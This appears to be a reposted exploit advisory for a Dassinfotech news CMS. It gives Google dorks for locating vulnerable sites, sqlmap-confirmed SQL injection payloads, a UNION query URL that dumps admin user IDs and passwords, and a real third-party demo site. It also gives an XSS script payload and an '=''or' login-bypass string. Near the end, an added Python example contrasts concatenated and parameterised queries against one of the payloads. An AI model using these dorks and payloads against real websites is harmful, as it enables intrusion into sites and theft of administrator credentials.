News website CMS SQL injection & Bypass Admin Panel & XSS Vulnerability & Remote code Execution By Aryan Chehreghani

2020.06.05
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+ Exploit Title: News website CMS SQL injection & Bypass Admin Panel && XSS Vulnerability By Aryan Chehreghani
+ Date: 2020-06-05
+ Vendor Homepage: https://www.dassinfotech.com
+ Auxiliary software : http://sqlmap.org
+ Exploit Author : Aryan Chehreghani | Ictus_TM
+ Dork CVE: CVE-2019-13409
+ Dork CWE : CWE-89
+ Version: All Version
+ Tested on: win,linux,mac
#########################################################################
+ Dork 1 : intext:Design by Dassinfotech.com
+ Dork 2 : inurl:detailsnews.php?id=
+ Dork 3 : intext:Design by Dassinfotech.com inurl:detailsnews.php?id=
+ Dork 4 : inurl:php?id= intext:Design By Dassinfotech.com
#########################################################################
[SQL injection]
[+] Method ( Sql injection ) Ictus Security Team of Iran
[+] parameter : id = latestnews.php?catid=25
#########################################################################
[+] Testing Method:
[+] - UNION query

__________SQLMAP__________result :
|||||||||||||||||||||||
Parameter: sec (GET) ||
|||||||||||||||||||||||
Parameter: catid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: catid=15' AND 6574=6574 AND 'RCcd'='RCcd

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: catid=15' AND (SELECT 9314 FROM (SELECT(SLEEP(5)))mkCY) AND 'rCId'='rCId

    Type: UNION query
    Title: Generic UNION query (NULL) - 19 columns
    Payload: catid=15' UNION ALL SELECT CONCAT(0x716b767171,0x6c746c51566743754d72706e67777068776f58415443736f62786f4d716448795a6b56744f664a61,0x716a6a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++|
[+]Using Sqlmap Example :
sqlmap -u http://target.com/latestnews.php?catid=25 --dbs
========================================================================|
Exploit ==>
latestnews.php?catid=-23%27%20union%20select%201,2,3,4,5,6,7,group_concat(userid,Password),9,10,11,12,13,14,15,16,17,18,19%20fRom%20admin--%20-
========================================================================|
Demo:
[+] http://ncrlife.in/latestnews.php?catid=25[SQL]
========================================================================|
[XSS Vulnerability]
[+] Method :"><script>alert('Aryan Chehreghani | Ictus_TM')</script><"
[+] Type Code IN search Value / some Value
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[Bypass Admin panel]
[+] Payload U / P : '=''or' / '=''or'
[+]Login Pages :
victim.com/matri/login.php
victim.com/india/login.php
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[=] T.me/Clvsornapv
[=] Telegram Channel ==> T.me/Ictus_TM
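
A defensive illustration of the catid finding above, added here and not taken from the advisory or the vendor's code: the same quoted-string query built by concatenation, then with a bound parameter and integer validation, run against the boolean-based payload from the sqlmap output. It uses Python with an in-memory SQLite table as a stand-in for the PHP/MySQL application; the table, rows and function names are constructed for the example.

```python
import sqlite3

# Boolean-based payload exactly as listed in the sqlmap output above.
PAGE_PAYLOAD = "15' AND 6574=6574 AND 'RCcd'='RCcd"

def make_db():
    """Constructed stand-in for the CMS news table (real schema is not on the page)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news (id INTEGER PRIMARY KEY, catid INTEGER, title TEXT);
        INSERT INTO news (catid, title) VALUES
            (15, 'Budget passed'), (15, 'Local election'), (25, 'Match report');
    """)
    return db

def latest_news_vulnerable(db, catid):
    # The request value is pasted into the SQL text, so a quote inside it
    # closes the string literal and the rest is parsed as SQL.
    sql = "SELECT title FROM news WHERE catid = '" + catid + "' ORDER BY id"
    return [row[0] for row in db.execute(sql)]

def latest_news_bound(db, catid):
    # Bound parameter: the value travels separately from the SQL text and is
    # only ever compared as data.
    sql = "SELECT title FROM news WHERE catid = ? ORDER BY id"
    return [row[0] for row in db.execute(sql, (catid,))]

def parse_catid(raw):
    # Allowlist validation: a category id is a short run of ASCII digits.
    if not (raw.isascii() and raw.isdigit() and len(raw) <= 9):
        raise ValueError("catid must be a decimal integer")
    return int(raw)

def latest_news_hardened(db, catid):
    # Validate first, then bind the resulting integer.
    return latest_news_bound(db, parse_catid(catid))

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", latest_news_vulnerable(db, PAGE_PAYLOAD))
    print("bound only:", latest_news_bound(db, PAGE_PAYLOAD))
    try:
        latest_news_hardened(db, PAGE_PAYLOAD)
    except ValueError as exc:
        print("hardened rejects:", exc)
```

In the concatenated query the payload returns the same rows as a plain `15`, which is the signal a boolean-based scanner keys on; with binding it matches nothing, and with validation it never reaches the database.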



Copyright 2020, cxsecurity.com

 
